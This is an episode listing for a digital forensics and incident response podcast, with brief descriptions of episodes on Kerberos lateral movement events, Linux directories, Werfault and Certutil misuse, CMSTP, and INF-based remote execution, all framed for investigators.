Listen to talk about computer forensic analysis, techniques, methodology, tool reviews and more.
http://digitalforensicsurvivalpodcast.libsyn.com/podcast
Gesamtlänge aller Episoden: 6 days 5 minutes
DFSP # 407 - More About Lateral Movement and Kerberos
This week it's more about lateral movement and kerberos events.
DFSP # 406 - All the BIN Directories
In a typical Linux "bin" directory, you can find various types of executable files and scripts that are used to perform different tasks. The confusing part is that there are a number of different BIN directories throughout the file system. What is the...
DFSP # 405 - Werfault Attacks
Werfault is in interesting artifact in that there is not a lot of documentation on it but yet it may affect an investigation in different ways. Its appearance in logs sometimes adds a bit of confusion to an investigation because it could mean...
DFSP # 404 - Certutil Attacks
Certutil, a powerful command-line utility, possesses the potential for misuse by malicious actors to establish illicit network connections. Therefore, it is crucial to familiarize oneself with its legitimate applications and recognize common...
DFSP # 403 - Lateral Movement Kerberos Auth Events
This week I'm going to cover an important Windows event that provides valuable information about authentication attempts and potential security breaches. The event may be used to identify compromised accounts, identify brute, force, attacks, or...
DFSP # 402 - Linux Root Directory Files for DFIR
In Linux and Unix-based operating systems, the "root" account is the superuser or administrator account with the highest level of privileges. It has complete control over the system and can perform any action, including modifying system files,...
DFSP # 401 - INF Fetch Execute
This week we are taking a bit of a deep dive into an advanced attack technique to accomplish remote execution called “fetch and execute.” While there are different methods to accomplish the sort of thing what I am going to be focusing on is...
DFSP # 400 - CMSTP
This week I am going to focus on a specific remote execution technique that you may see in the wild. Remote execution is important for incident response investigations but also for file use and knowledge investigations, particularly those that...
DFSP # 399 - Lateral Movement Failed Logon Events
Finding and analyzing failed logons sometimes is just as important as finding suspicious, actual logon activity. Like anything, context is important. Old logon records offer an opportunity to identify not only suspicious activity, but perhaps...
DFSP # 398 - OODA & JOHARI
This week I will discuss the use of the OODA loop and JOHARI window in security incident response investigations. These two frameworks are designed to help organizations quickly and effectively respond to security incidents, and can be used in...